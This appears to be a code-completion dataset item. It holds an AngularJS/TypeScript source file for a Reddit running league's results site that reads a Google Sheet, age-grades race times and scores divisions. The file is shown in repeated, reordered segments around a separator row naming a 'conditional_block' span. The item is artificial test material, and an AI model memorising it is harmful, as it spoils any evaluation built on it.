getThemeUrl() {
let ap = this.shouldAutoplay();
return this.$sce.trustAsResourceUrl(`https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/460111206&auto_play=${ap}&hide_related=false&show_comments=true&show_user=true&show_reposts=false&visual=true`);
}
}
/**
* Individual event controller for event results pages
*/
class EventController {
tab: string = 'results';
hasRelay: boolean = false;
event: MEvent;
static $inject = ['$http', '$state', '$timeout', '$location', '$anchorScroll',
'$stateParams', 'Events', 'Results'];
constructor(private $http: angular.IHttpService,
private $state: ng.ui.IStateService,
private $timeout: angular.ITimeoutService,
private $location: angular.ILocationService,
private $anchorScroll: angular.IAnchorScrollService,
private $params: ng.ui.IStateParamsService,
private Events: Events,
private Results: Results)
{
this.$anchorScroll.yOffset = 60;
this.init();
}
async init() {
if (this.$params.tab) {
this.tab = this.$params.tab;
}
let eventName = this.$state.current.name;
this.event = await this.Results.getEventResults(eventName);
console.log({event: this.event});
this.$timeout(this.$anchorScroll);
}
changeTab(tab: string) {
this.tab = tab;
this.$state.go(this.$state.current.name, {tab});
}
}
/**
* AgeService
* Manages age grading calculations. Defaults to no grade.
*/
interface Grade {
id: string;
event: string;
isRoad: boolean;
mf: Sex;
age: number;
factor: number;
}
type Sex = 'F'|'M';
class AgeService {
static GRADES: {[mfEventId: string]: {[age: number]: Grade}} = {};
static COLS = {
MFEVENTID : 0,
EVENTID: 1,
ISROAD: 2,
DISTANCE_KM: 3,
WORLD_RECORD_SEC: 4,
AGE_START: 5
};
static WORLD_RECORD = 'World Record';
static parse(file: string) {
let COL = AgeService.COLS;
let lines = file.split('\n');
for (let line of lines) {
if (!line.trim()) { continue; }
let parts = line.split('\t');
if (parts[0] == 'Event') { continue; }
// set up base object
let grade: Partial<Grade> = {
event: parts[COL.EVENTID],
isRoad: parts[COL.ISROAD] == '1',
mf: <Sex>parts[COL.MFEVENTID].substr(0, 1)
};
let id = parts[COL.MFEVENTID];
if (!AgeService.GRADES[id]) { AgeService.GRADES[id] = {}; }
// assign world record
AgeService.GRADES[id][AgeService.WORLD_RECORD] = <Grade>Object.assign({record: parseFloat(parts[COL.WORLD_RECORD_SEC])});
// assign age groups
let START = COL.AGE_START;
for (let ii = START; ii < parts.length - 1; ii++) {
let age = ii + 1;
let factor = parseFloat(parts[ii]);
AgeService.GRADES[id][age] = <Grade>Object.assign({age, factor, id}, grade);
}
}
console.log(AgeService.GRADES)
}
ageGrade(event: string, age: number, sex: Sex, seconds: number, username?: string): number {
if (!seconds) { return seconds; }
if (!sex) { sex = 'M'; }
event = event.replace(/\s/g, '');
let mfEventId = `${sex}${event}`;
let gradedTime = seconds;
let factor = 1;
if (AgeService.GRADES[mfEventId]) {
let mfEvent = AgeService.GRADES[mfEventId];
if (mfEvent[age]) {
factor = mfEvent[age].factor;
gradedTime = seconds * factor;
}
}
console.log(`${username} ${mfEventId} age:${age} time:${seconds} factor:${factor} graded:${gradedTime}`)
return gradedTime;
}
percentGrade(event: string, sex: Sex, seconds: number, username?: string): number {
if (!seconds) { return 0; }
if (!sex) { sex = 'M'; }
event = event.replace(/\s/g, '');
let percent = 0;
let wr;
let mfEventId = `${sex}${event}`;
if (AgeService.GRADES[mfEventId]) {
let mfEvent = AgeService.GRADES[mfEventId];
wr = mfEvent[AgeService.WORLD_RECORD];
percent = wr.record / seconds;
}
console.log(`${username} ${mfEventId} time:${seconds} WR:${wr?.record} percent:${percent}`);
return percent;
}
}
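// Illustrative sketch (editor's addition): age-grading a 25:00 5k for a 50-year-old man.
// Assumes AgeService.parse() has already loaded a grade table with an "M5k" row; the
// event id used here ('5k') is an assumption about how events are named in the sheet.
//
//   const ageSvc = new AgeService();
//   const graded = ageSvc.ageGrade('5k', 50, 'M', 25 * 60); // raw seconds * age factor
//   const pct = ageSvc.percentGrade('5k', 'M', graded);     // world-record seconds / graded seconds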
/**
* TimeService
* Time calculations -> string to number / number to string
*/
class TimeService {
toString(time: number): string {
if (!time) { return null; }
let hours = Math.floor(time / (60 * 60));
time = time - (hours * 60 * 60);
let minutes = Math.floor(time / 60);
time = time - (minutes * 60);
let seconds = time.toFixed(1);
let secondsNum = time;
if (hours) {
return `${hours}:${_.padStart(minutes+'',2,'0')}:${(secondsNum < 10 ? '0' : '') + seconds}`;
} else {
return `${minutes}:${(secondsNum < 10 ? '0' : '') + seconds}`;
}
}
toNumber(time: string): number {
if (!time) { return null; }
let parts = time.split(':').map(t => parseFloat(t));
if (parts.length == 3) {
return parts[0]*60*60 + parts[1]*60 + parseFloat(''+parts[2]);
} else {
return parts[0]*60 + parseFloat(''+parts[1]);
}
}
}
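// Example (editor's addition): TimeService round-trips "m:ss.s" / "h:mm:ss.s" strings.
//
//   const timeSvc = new TimeService();
//   timeSvc.toNumber('17:45.3'); // -> 1065.3 (seconds)
//   timeSvc.toString(1065.3);    // -> '17:45.3'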
function promiseFix($rootScope) {
// await fix -- native await resolution doesn't trigger an AngularJS digest, so run one manually on resolve/reject
Promise = ((Promise) => {
const NewPromise = function (fn) {
const promise = new Promise(fn);
promise.then((value) => {
$rootScope.$applyAsync();
return value;
}, (err) => {
$rootScope.$applyAsync();
throw err;
});
return promise;
};
// Clone the prototype
NewPromise.prototype = Promise.prototype;
// Clone all writable instance properties
for (const propertyName of Object.getOwnPropertyNames(Promise)) {
const propertyDescription = Object.getOwnPropertyDescriptor(Promise, propertyName);
if (propertyDescription.writable) {
NewPromise[propertyName] = Promise[propertyName];
}
}
return NewPromise;
})(Promise) as any;
}
function preload($http, $stateRegistry, $urlRouter, Events: Events, ageSvc: AgeService, google: GoogleSvc) {
return google.load().then(() => {
return Promise.all([
Events.list()
.then(evts => {
for (let evt of evts) {
let state = {
name: evt.state,
templateUrl: `${BASE}event.html`,
controller: 'event',
url: evt.url + "?tab",
params: {
tab: {dynamic: true}
},
controllerAs: 'EC'
};
$stateRegistry.register(state);
}
// after registering states, listen on the router
$urlRouter.sync();
$urlRouter.listen();
}),
$http.get(`${BASE}age-grade.txt`)
.then(x => x.data)
.then(data => {
AgeService.parse(data);
})
]);
});
}
angular
.module('ar', ['ui.router'])
.config(['$stateProvider', '$sceDelegateProvider', '$urlRouterProvider', '$locationProvider', function ($sp, $sce, $url, $loc) {
$sce.resourceUrlWhitelist([
'self',
`${BASE}**`
]);
$url.deferIntercept();
$sp.state({
name: 'Calendar',
templateUrl: `${BASE}calendar.html`,
controller: 'calendar',
url: '/calendar',
controllerAs: 'CC'
});
$sp.state({
name: 'Leaderboard',
templateUrl: `${BASE}leaderboard.html`,
controller: 'leaderboard',
url: '/leaderboard',
controllerAs: 'LC'
});
$url.otherwise('/calendar');
}])
.run(['$rootScope', promiseFix])
.run(['$http', '$stateRegistry', '$urlRouter', 'Events', 'AgeService', 'Google', preload])
.service('Google', GoogleSvc)
.service('Events', Events)
.service('Users', Users)
.service('Divisions', Divisions)
.service('AgeService', AgeService)
.service('TimeService', TimeService)
.service('Results', Results)
.controller('calendar', Calendar)
.controller('main', MainController)
.controller('event', EventController)
.directive('fixedTop', ['$window', function ($window) {
return {
restrict: 'A',
link: function (scope, elem, attrs, ctrl) {
let $win = angular.element($window);
let fixed = parseInt(attrs.fixedTop) || 50;
$win.on('scroll', e => {
let width = Math.max(window.innerWidth, document.documentElement.clientWidth);
if (width < 550 || $window.pageYOffset < fixed) {
elem.css({position: 'relative', top: '' });
} else {
elem.css({position: 'relative', top: ($window.pageYOffset - fixed) + 'px' });
}
});
}
};
}])
.filter('percent', ['$filter', function($filter) {
return function(input, decimals = 1) {
return $filter('number')(input * 100, decimals) + '%';
};
}]);
| { return this.events; } | conditional_block |
mooseleague_ts.ts | // to prevent this loading twice in dev - hacky hacky whatever shut your face
// if (!window['apploaded']) {
// window['apploaded'] = true;
// throw "Already loaded";
// }
declare var byx;
declare var lmw;
interface MEvent {
name: string;
url: string;
date: string|Date|moment.Moment;
state: string;
events: string;
link: string;
submit: string;
editLink: string;
displayDate: string;
live?: boolean;
days?: number;
hours?: number;
minutes?: number;
results: MEventRaceResults[];
}
interface MEventRaceResults {
race: string;
divisions: MDivisionRaceResult[];
times: MUserRaceResult[];
}
interface MUser {
user: string;
link: string;
age: number;
sex: Sex;
division: string;
results: MUserEventResult[];
}
interface MUserEventResult {
event: string;
times: MUserRaceResult[];
}
interface MUserRaceResult {
username: string;
race: string;
time: string;
time_number: number;
age_graded_time: string;
age_graded_time_number: number;
percent_world_record: number;
note: string;
sex: Sex;
links: MLink[];
place: number;
points: number;
division: string;
}
interface MDivision {
name: string;
users: Array<MUser>;
}
interface MDivisionRaceResult {
name: string;
race: string;
points: number;
athletes: number;
note: string;
place: number;
}
interface MLink {
type: string;
url: string;
favicon: string;
}
interface BreadCrumb {
name: string;
last: boolean;
link?: string;
}
let BASE = 'https://jgr3go.github.io/reddit_ar/mooseleague/';
if (window.location.href.match(/localhost/)) {
BASE = '';
}
let GAPI = new Promise((resolve, reject) => {
gapi.load('client', {
callback: async () => {
// this isn't great, but the apikey should be limited to very specific things
await gapi.client.init({apiKey: `${byx}1XThhfQZLh6YcTKwLz${lmw}`});
resolve();
}
});
});
function isMobile() {
return !!(navigator.userAgent.match(/Android/i) ||
navigator.userAgent.match(/webOS/i) ||
navigator.userAgent.match(/iPhone/i) ||
navigator.userAgent.match(/iPad/i) ||
navigator.userAgent.match(/iPod/i) ||
navigator.userAgent.match(/BlackBerry/i) ||
navigator.userAgent.match(/Windows Phone/i));
}
function stripDivision(div: string) {
if (div.includes("(")) {
return div.substr(0, div.indexOf("("));
}
return div;
}
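// stripDivision usage sketch (hypothetical division label, not from the sheet):
//   stripDivision('Alpha (East)') -> 'Alpha '   (keeps everything before '(', including the trailing space)
//   stripDivision('Alpha')        -> 'Alpha'    (returned unchanged when no parenthesis is present)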
/**
* Loads google sheet and does most of the processing into raw data objects
*/
class GoogleSvc {
private spreadsheet: gapi.client.sheets.Spreadsheet;
private Events: Array<MEvent> = [];
private Users: Array<MUser> = [];
private Divisions: Array<MDivision> = [];
private built: boolean = false;
private loading: Promise<any>;
public USER_COLUMNS = {
TIMESTAMP: 0,
USERNAME: 1,
DIVISION: 2,
AGE: 3,
SEX: 4,
RESULT: 5,
NOTES: 6,
LINKS: 7
};
private async ready() {
if (this.loading) { return await this.loading; }
this.loading = new Promise(async (resolve, reject) => {
try {
await GAPI;
await gapi.client.load('sheets', 'v4');
let sheet = await gapi.client.sheets.spreadsheets.get({
spreadsheetId: '1ZC7pDg9VRiqnd4-w15LUSWcvQXti62IOSp0dcYj2JZI',
includeGridData: true
});
console.log(sheet.result);
this.spreadsheet = sheet.result;
resolve();
} catch (e) {
reject(e);
}
});
}
async load() {
await this.getSpreadsheet();
}
private async getSpreadsheet(): Promise<gapi.client.sheets.Spreadsheet> {
if (this.spreadsheet) { return this.spreadsheet; }
await this.ready();
return this.spreadsheet;
}
private async build() {
if (this.built) { return; }
await this.getSpreadsheet();
this.buildEvents();
this.buildUsers();
this.buildDivisions();
this.mergeEventsUsers();
this.built = true;
}
private buildEvents() {
let events: MEvent[] = [];
for (let sheet of this.spreadsheet.sheets) {
let evt: MEvent = <MEvent>{};
evt.name = sheet.properties.title;
let data = sheet.data[0];
if (!data || !data.rowData) { continue; }
for (let row of data.rowData) {
if (!row.values || !row.values.length) { continue; }
if (!row.values[1]?.formattedValue) { continue; }
switch (row.values[0]?.formattedValue) {
case 'Event':
evt.events = row.values[1]?.formattedValue;
break;
case 'Date':
evt.date = moment(row.values[1]?.formattedValue).year(moment().year());
evt.displayDate = moment(evt.date).format('MMM D, YYYY');
break;
case 'Results':
evt.link = row.values[1]?.formattedValue;
break;
case 'Form':
evt.submit = row.values[1]?.formattedValue;
break;
default:
break;
}
evt.state = evt.name;
evt.url = `/${ evt.name.split(' ').join('').toLowerCase()}`;
evt.editLink = `${this.spreadsheet.spreadsheetUrl}#gid=${sheet.properties.sheetId}`;
evt.results = evt.events.split(',').map(e => {
return {
race: e,
divisions: [],
times: []
};
});
}
events.push(evt);
}
this.Events = events;
}
private buildUsers() {
let users: MUser[] = [];
let COL = this.USER_COLUMNS;
for (let sheet of this.spreadsheet.sheets) {
let eventName = sheet.properties.title;
let raceName: string;
let data = sheet.data[0];
if (!data || !data.rowData) { continue; }
let startUserRows = false;
for (let row of data.rowData) {
if (!row.values || !row.values.length) { continue; }
if (!startUserRows) {
if (row.values[0]?.formattedValue == 'Event') {
raceName = row.values[1]?.formattedValue;
}
if (row.values[COL.USERNAME]?.formattedValue == 'Username') {
startUserRows = true;
}
} else {
let username = row.values[COL.USERNAME]?.formattedValue || "";
if (!username) { break; }
// first time finding user, add to master list
if (!users.find(u => u.user.toLowerCase() == username.toLowerCase())) {
let user: Partial<MUser> = {
user: username,
division: stripDivision(row.values[COL.DIVISION]?.formattedValue || ""),
age: parseInt(row.values[COL.AGE]?.formattedValue) || null,
sex: <Sex>row.values[COL.SEX]?.formattedValue?.substr(0,1).toUpperCase(),
results: []
};
user.link = `https://reddit.com/u/${user.user}`;
users.push(<MUser>user);
}
let user = users.find(u => u.user.toLowerCase() == username.toLowerCase());
let time = row.values[COL.RESULT]?.formattedValue;
if (time?.substr(0, 1) == "'") {
time = time.substr(1);
}
user.results.push({
event: eventName,
times: raceName.split(',').map(r => {
return <MUserRaceResult>{
race: r,
username: user.user,
division: user.division,
sex: user.sex,
time: time,
note: row.values[COL.NOTES]?.formattedValue,
links: row.values[COL.LINKS]?.formattedValue?.split(',').map(link => {
return <MLink>{
type: this.getLinkType(link),
favicon: this.getFavicon(link),
url: link
}
})
};
})
});
}
}
}
this.Users = users;
}
private getLinkType(link: string) {
if (link.match(/strava/)) { return 'strava'; }
if (link.match(/youtu/)) { return 'youtube'; }
if (link.match(/redd/)) { return 'reddit'; }
return '';
}
private getFavicon(link: string) {
let match = link.match(/(https?\:\/\/[^\/]+)/);
if (!match) { return 'https://google.com/favicon.ico'; }
let root = match[1].trim();
if (root.substr(0, 4) != "http") {
root = `http://${root}`;
}
return `${root}/favicon.ico`;
}
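// getFavicon sketch (illustrative URLs): a protocol-less link like 'strava.com/activities/1' has no
// 'https://...' match, so it falls back to the Google favicon; a full link such as
// 'https://www.strava.com/activities/1' yields 'https://www.strava.com/favicon.ico'.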
private buildDivisions() {
let divisions: MDivision[] = [];
for (let user of this.Users) {
if (!divisions.find(d => d.name.toLowerCase() == user.division.toLowerCase())) {
divisions.push({
name: user.division,
users: []
});
}
let division = divisions.find(d => d.name.toLowerCase() == user.division.toLowerCase());
division.users.push(user);
}
}
private mergeEventsUsers() {
// first merge any events into the users
for (let evt of this.Events) {
for (let user of this.Users) {
// add DNS events to every user for events they didn't do
if (!user.results.find(r => r.event.toLowerCase() == evt.name.toLowerCase())) {
user.results.push({
event: evt.name,
times: evt.events.split(',').map(race => (<MUserRaceResult>{
race: race,
username: user.user,
division: user.division,
note: 'DNS'
}))
})
}
}
}
// then merge user results into the events
for (let user of this.Users) {
for (let result of user.results) {
let evt = this.Events.find(e => e.name.toLowerCase() == result.event.toLowerCase());
if (evt) {
for (let time of result.times) {
let evtResult = evt.results.find(r => r.race.toLowerCase() == time.race.toLowerCase());
evtResult.times.push(time);
if (!evtResult.divisions.find(d => d.race.toLowerCase() == time.race.toLowerCase()
&& d.name.toLowerCase() == time.division.toLowerCase()))
{
evtResult.divisions.push({
name: time.division,
race: time.race,
points: null,
athletes: 0,
note: null,
place: null
});
}
}
}
}
}
}
async listEvents(): Promise<MEvent[]> {
await this.build();
return this.Events;
}
async listUsers(): Promise<MUser[]> {
await this.build();
return this.Users;
}
async listDivisions(): Promise<MDivision[]> {
await this.build();
return this.Divisions;
}
}
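// Sheet layout assumed by GoogleSvc (inferred from the parsing above): each tab is one event whose
// header rows are keyed 'Event', 'Date', 'Results' and 'Form' in column A, followed by a 'Username'
// header row and then one submission per row matching USER_COLUMNS (username, division, age, sex,
// result, notes, links).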
/**
* Container for the events, logic for what's next etc
*/
class Events {
static $inject = ['$http', '$q', 'Google'];
private events: Array<MEvent> = [];
constructor(public $http: angular.IHttpService,
public $q: angular.IQService,
public google: GoogleSvc) { }
async list(): Promise<Array<MEvent>> {
if (this.events && this.events.length) { return this.events; }
this.events = await this.google.listEvents();
this.events = _.orderBy(this.events, e => e.date);
return this.events;
}
async get(eventName: string): Promise<MEvent> {
let events = await this.list();
return events.find(x => x.name.replace(/\s+/g, '').toLowerCase() == eventName.replace(/\s+/g, '').toLowerCase());
}
async latest() {
let events = await this.list();
if (events.length == 1) {
return events[0];
}
if (events[events.length- 2]) {
let date = moment(events[events.length - 2].date).format('YYYY-MM-DD');
if (moment().format('YYYY-MM-DD') == date) {
return events[events.length - 2];
}
}
return events[events.length - 1];
}
async next() {
let events = await this.list();
if (events.length == 1) {
return events[0];
}
let active = events.find(e => !!e.submit);
if (active) { return active; }
let next = events[events.length - 1];
for (let ii = events.length - 1; ii >= 0; ii--) {
if (moment(events[ii].date) >= moment().startOf('day')) {
next = events[ii];
}
}
return next;
}
}
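// Events.next() selection sketch: prefer the first event with an open submit form; otherwise the
// earliest event dated today or later; if every event is in the past, fall back to the most recent one.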
/**
* Container for users, logic for age grading etc
*/
class Users {
users: MUser[] = [];
static $inject = ['Google', 'TimeService', 'AgeService'];
constructor(public google: GoogleSvc, public timeSvc: TimeService, public ageSvc: AgeService) {}
async list() {
if (this.users.length) { return this.users; }
this.users = await this.google.listUsers();
for (let user of this.users) {
for (let result of user.results) {
for (let time of result.times) {
time.time_number = this.timeSvc.toNumber(time.time);
time.age_graded_time_number = this.ageSvc.ageGrade(time.race, user.age, user.sex, time.time_number, user.user);
time.age_graded_time = this.timeSvc.toString(time.age_graded_time_number);
time.percent_world_record = this.ageSvc.percentGrade(time.race, user.sex, time.age_graded_time_number, user.user);
}
}
}
return this.users;
}
}
/**
* Container for divisions
*/
class Divisions {
divisions: MDivision[] = [];
static $inject = ['Google'];
constructor(private google: GoogleSvc) {}
async list() {
if (this.divisions.length) { return this.divisions; }
this.divisions = await this.google.listDivisions();
return this.divisions;
}
}
/**
* Does the bulk of the calculations for results, division grouping and scoring
*/
class Results {
results: MEvent[];
static $inject = ['Events', 'Users', 'Divisions'];
constructor(private Events: Events,
private Users: Users,
private Divisions: Divisions) {}
async calculate() {
if (this.results) { return this.results; }
let events = await this.Events.list();
let users = await this.Users.list();
let divisions = await this.Divisions.list();
this.score(events);
console.log({events})
this.results = events;
return this.results;
}
score(events: MEvent[]) {
for (let event of events) {
for (let race of event.results) {
let divs = _.keyBy(race.divisions, d => d.name.toLowerCase());
race.times = _.orderBy(race.times, [t => t.percent_world_record, t => t.time_number, t => t.username], ['desc', 'asc', 'asc']);
let place = 1;
for (let time of race.times) {
if (time.time) {
time.place = place++;
let divname = time.division.toLowerCase();
divs[divname].athletes += 1;
if (divs[divname].athletes <= 5) {
time.points = time.place;
divs[divname].points += time.place;
}
}
else {
time.points = null;
}
}
race.divisions = _.orderBy(race.divisions, [d => d.athletes >= 5 ? -1 : 1, d => d.points]);
place = 1;
for (let div of race.divisions) {
if (div.athletes >= 5) {
div.place = place++;
} else {
div.note = "DQ (Not enough finishers)";
}
}
}
}
}
async getEventResults(name: string) {
await this.calculate();
return this.results.find(x => x.name.replace(/\s+/g, '').toLowerCase() == name.replace(/\s+/g, '').toLowerCase());
}
}
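// Results scoring sketch (hypothetical places): only a division's first five finishers score, and lower
// is better. Finishers at overall places 1, 3, 4, 7, 9 and 12 score 1 + 3 + 4 + 7 + 9 = 24; divisions
// with fewer than five finishers are marked "DQ (Not enough finishers)".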
/**
* Default page calendar view
*/
class Calendar {
static $inject = ['$http', 'Events'];
events: Array<MEvent> = [];
constructor (public $http: angular.IHttpService, public Events: Events) {
this.init();
}
async init() {
this.events = [];
let evts = await this.Events.list();
for (let evt of evts) {
evt = _.clone(evt);
evt.date = moment(evt.date).format('MMM D, YYYY');
this.events.push(evt);
}
}
}
/**
* Main controller loaded at start
*/
class MainController {
public isMobile: boolean;
public autoplay: boolean;
public events: Array<MEvent> = [];
public next: MEvent;
public autoplayKey: string;
public lastState: string;
public crumbs: BreadCrumb[] = [];
static $inject = ['$http', '$location', '$timeout', '$state', 'Events', '$sce'];
constructor(public $http: angular.IHttpService,
public $location: angular.ILocationService,
public $timeout: angular.ITimeoutService,
public $state: ng.ui.IStateService,
public Events: Events,
public $sce: angular.ISCEService)
{
this.autoplay = localStorage.getItem('autoplay2020') === null ? true : localStorage.getItem('autoplay2020') == 'true';
this.isMobile = isMobile();
this.autoplayKey = 'autoplay' + moment().year();
this.init();
}
async init() {
let [evts, evt] = await Promise.all([this.Events.list(), this.Events.next()]);
this.events = evts;
this.next = <MEvent>{
name: evt.name.toUpperCase(),
date: moment(evt.date),
state: evt.state,
displayDate: moment(evt.date).format('MMM D, YYYY'),
submit: evt.submit,
live: false
};
this.countdown();
}
countdown() {
if (this.next) {
let now = moment();
let evt = moment(this.next.date);
if (now.format('YYYY-MM-DD') === evt.format('YYYY-MM-DD')) {
this.next.live = true;
} else if (this.next.submit) {
this.next.live = true;
} else {
let days = evt.diff(now, 'days');
this.next.days = days;
evt.subtract(days, 'days');
let hours = evt.diff(now, 'hours');
this.next.hours = hours;
evt.subtract(hours, 'hours');
let minutes = evt.diff(now, 'minutes');
this.next.minutes = minutes;
}
this.$timeout(() => this.countdown(), 1000 * 60);
} else {
this.$timeout(() => this.countdown(), 500);
}
}
getBreadcrumbs() {
if (this.$state.current.name === this.lastState) {
return this.crumbs;
}
this.lastState = this.$state.current.name;
this.crumbs = [];
if (this.lastState !== 'Calendar') {
this.crumbs = [
{name: 'Home', last: false, link: 'Calendar'},
{name: this.lastState, last: true}
];
} else {
this.crumbs = [
{name: 'Home', last: true}
];
}
return this.crumbs;
}
stopAutoplay() {
localStorage.setItem(this.autoplayKey, 'false');
this.autoplay = false;
}
startAutoplay() {
localStorage.setItem(this.autoplayKey, 'true');
this.autoplay = true;
}
shouldAutoplay() {
let ap = localStorage.getItem(this.autoplayKey);
return !(ap === 'false');
}
getThemeUrl() {
let ap = this.shouldAutoplay();
return this.$sce.trustAsResourceUrl(`https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/460111206&auto_play=${ap}&hide_related=false&show_comments=true&show_user=true&show_reposts=false&visual=true`);
}
}
/**
* Individual event controller for event results pages
*/
class EventController {
tab: string = 'results';
hasRelay: boolean = false;
event: MEvent;
static $inject = ['$http', '$state', '$timeout', '$location', '$anchorScroll',
'$stateParams', 'Events', 'Results'];
constructor(private $http: angular.IHttpService,
private $state: ng.ui.IStateService,
private $timeout: angular.ITimeoutService,
private $location: angular.ILocationService,
private $anchorScroll: angular.IAnchorScrollService,
private $params: ng.ui.IStateParamsService,
private Events: Events,
private Results: Results)
{
this.$anchorScroll.yOffset = 60;
this.init();
}
async init() {
if (this.$params.tab) {
this.tab = this.$params.tab;
}
let eventName = this.$state.current.name;
this.event = await this.Results.getEventResults(eventName);
console.log({event: this.event});
this.$timeout(this.$anchorScroll);
}
changeTab(tab: string) {
this.tab = tab;
this.$state.go(this.$state.current.name, {tab});
}
}
/**
* AgeService
* Manages age grading calculations. Defaults to no grade.
*/
interface Grade {
id: string;
event: string;
isRoad: boolean;
mf: Sex;
age: number;
factor: number;
}
type Sex = 'F'|'M';
class AgeService {
static GRADES: {[mfEventId: string]: {[age: number]: Grade}} = {};
static COLS = {
MFEVENTID : 0,
EVENTID: 1,
ISROAD: 2,
DISTANCE_KM: 3,
WORLD_RECORD_SEC: 4,
AGE_START: 5
};
static WORLD_RECORD = 'World Record';
static parse(file: string) {
let COL = AgeService.COLS;
let lines = file.split('\n');
for (let line of lines) {
if (!line.trim()) { continue; }
let parts = line.split('\t');
if (parts[0] == 'Event') { continue; }
// set up base object
let grade: Partial<Grade> = {
event: parts[COL.EVENTID],
isRoad: parts[COL.ISROAD] == '1',
mf: <Sex>parts[COL.MFEVENTID].substr(0, 1) // first character only: 'M' or 'F'
};
let id = parts[COL.MFEVENTID];
if (!AgeService.GRADES[id]) { AgeService.GRADES[id] = {}; }
// assign world record
AgeService.GRADES[id][AgeService.WORLD_RECORD] = <Grade>Object.assign({record: parseFloat(parts[COL.WORLD_RECORD_SEC])});
// assign age groups
let START = COL.AGE_START;
for (let ii = START; ii < parts.length - 1; ii++) {
let age = ii + 1;
let factor = parseFloat(parts[ii]);
AgeService.GRADES[id][age] = <Grade>Object.assign({age, factor, id}, grade);
}
}
console.log(AgeService.GRADES)
}
ageGrade(event: string, age: number, sex: Sex, seconds: number, username?: string): number {
if (!seconds) { return seconds; }
if (!sex) { sex = 'M'; }
event = event.replace(/\s/g, '');
let mfEventId = `${sex}${event}`;
let gradedTime = seconds;
let factor = 1;
if (AgeService.GRADES[mfEventId]) {
let mfEvent = AgeService.GRADES[mfEventId];
if (mfEvent[age]) {
factor = mfEvent[age].factor;
gradedTime = seconds * factor;
}
}
console.log(`${username} ${mfEventId} age:${age} time:${seconds} factor:${factor} graded:${gradedTime}`)
return gradedTime;
}
percentGrade(event: string, sex: Sex, seconds: number, username?: string): number {
if (!seconds) { return 0; }
if (!sex) { sex = 'M'; }
event = event.replace(/\s/g, '');
let percent = 0;
let wr;
let mfEventId = `${sex}${event}`;
if (AgeService.GRADES[mfEventId]) {
let mfEvent = AgeService.GRADES[mfEventId];
wr = mfEvent[AgeService.WORLD_RECORD];
percent = wr.record / seconds;
}
console.log(`${username} ${mfEventId} time:${seconds} WR:${wr?.record} percent:${percent}`);
return percent;
}
}
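// AgeService sketch (illustrative factor; real values come from age-grade.txt): with a factor of 0.94
// for M5k at age 40, ageGrade('5k', 40, 'M', 1052.4) ~= 989.3 seconds, and percentGrade then reports
// the event world record divided by that graded time.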
/**
* TimeService
* Time calculations -> string to number / number to string
*/
class TimeService {
toString(time: number): string {
if (!time) { return null; }
let hours = Math.floor(time / (60 * 60));
time = time - (hours * 60 * 60);
let minutes = Math.floor(time / 60);
time = time - (minutes * 60);
let seconds = time.toFixed(1);
let secondsNum = time;
if (hours) {
return `${hours}:${_.padStart(minutes+'',2,'0')}:${(secondsNum < 10 ? '0' : '') + seconds}`;
} else {
return `${minutes}:${(secondsNum < 10 ? '0' : '') + seconds}`;
}
}
toNumber(time: string): number {
if (!time) { return null; }
let parts = time.split(':').map(t => parseFloat(t));
if (parts.length == 3) {
return parts[0]*60*60 + parts[1]*60 + parseFloat(''+parts[2]);
} else {
return parts[0]*60 + parseFloat(''+parts[1]);
}
}
}
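// TimeService round-trip sketch: toNumber('17:32.4') -> 1052.4, toString(1052.4) -> '17:32.4', and
// toString(3725) -> '1:02:05.0' (hours are only included when non-zero).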
function promiseFix($rootScope) {
// await fix -- runs a digest manually on await because it doesn't naturally
Promise = ((Promise) => {
const NewPromise = function (fn) {
const promise = new Promise(fn);
promise.then((value) => {
$rootScope.$applyAsync();
return value;
}, (err) => {
$rootScope.$applyAsync();
throw err;
});
return promise;
};
// Clone the prototype
NewPromise.prototype = Promise.prototype;
// Clone all writable instance properties
for (const propertyName of Object.getOwnPropertyNames(Promise)) {
const propertyDescription = Object.getOwnPropertyDescriptor(Promise, propertyName);
if (propertyDescription.writable) {
NewPromise[propertyName] = Promise[propertyName];
}
}
return NewPromise;
})(Promise) as any;
}
function preload($http, $stateRegistry, $urlRouter, Events: Events, ageSvc: AgeService, google: GoogleSvc) {
return google.load().then(() => {
return Promise.all([
Events.list()
.then(evts => {
for (let evt of evts) {
let state = {
name: evt.state,
templateUrl: `${BASE}event.html`,
controller: 'event',
url: evt.url + "?tab",
params: {
tab: {dynamic: true}
},
controllerAs: 'EC'
};
$stateRegistry.register(state);
}
// after registering states, listen on the router
$urlRouter.sync();
$urlRouter.listen();
}),
$http.get(`${BASE}age-grade.txt`)
.then(x => x.data)
.then(data => {
AgeService.parse(data);
})
]);
});
}
angular
.module('ar', ['ui.router'])
.config(['$stateProvider', '$sceDelegateProvider', '$urlRouterProvider', '$locationProvider', function ($sp, $sce, $url, $loc) {
$sce.resourceUrlWhitelist([
'self',
`${BASE}**`
]);
$url.deferIntercept();
$sp.state({
name: 'Calendar',
templateUrl: `${BASE}calendar.html`,
controller: 'calendar',
url: '/calendar',
controllerAs: 'CC'
});
$sp.state({
name: 'Leaderboard',
templateUrl: `${BASE}leaderboard.html`,
controller: 'leaderboard',
url: '/leaderboard',
controllerAs: 'LC'
});
$url.otherwise('/calendar');
}])
.run(['$rootScope', promiseFix])
.run(['$http', '$stateRegistry', '$urlRouter', 'Events', 'AgeService', 'Google', preload])
.service('Google', GoogleSvc)
.service('Events', Events)
.service('Users', Users)
.service('Divisions', Divisions)
.service('AgeService', AgeService)
.service('TimeService', TimeService)
.service('Results', Results)
.controller('calendar', Calendar)
.controller('main', MainController)
.controller('event', EventController)
.directive('fixedTop', ['$window', function ($window) {
return {
restrict: 'A',
link: function (scope, elem, attrs, ctrl) {
let $win = angular.element($window);
let fixed = parseInt(attrs.fixedTop) || 50;
$win.on('scroll', e => {
let width = Math.max(window.innerWidth, document.documentElement.clientWidth);
if (width < 550 || $window.pageYOffset < fixed) {
elem.css({position: 'relative', top: '' });
} else {
elem.css({position: 'relative', top: ($window.pageYOffset - fixed) + 'px' });
}
});
}
};
}])
.filter('percent', ['$filter', function($filter) {
return function(input, decimals = 1) {
return $filter('number')(input * 100, decimals) + '%';
};
}]);

// mooseleague_ts.ts
// to prevent this loading twice in dev - hacky hacky whatever shut your face
// if (!window['apploaded']) {
// window['apploaded'] = true;
// throw "Already loaded";
// }
declare var byx;
declare var lmw;
interface MEvent {
name: string;
url: string;
date: string|Date|moment.Moment;
state: string;
events: string;
link: string;
submit: string;
editLink: string;
displayDate: string;
live?: boolean;
days?: number;
hours?: number;
minutes?: number;
results: MEventRaceResults[];
}
interface MEventRaceResults {
race: string;
divisions: MDivisionRaceResult[];
times: MUserRaceResult[];
}
interface MUser {
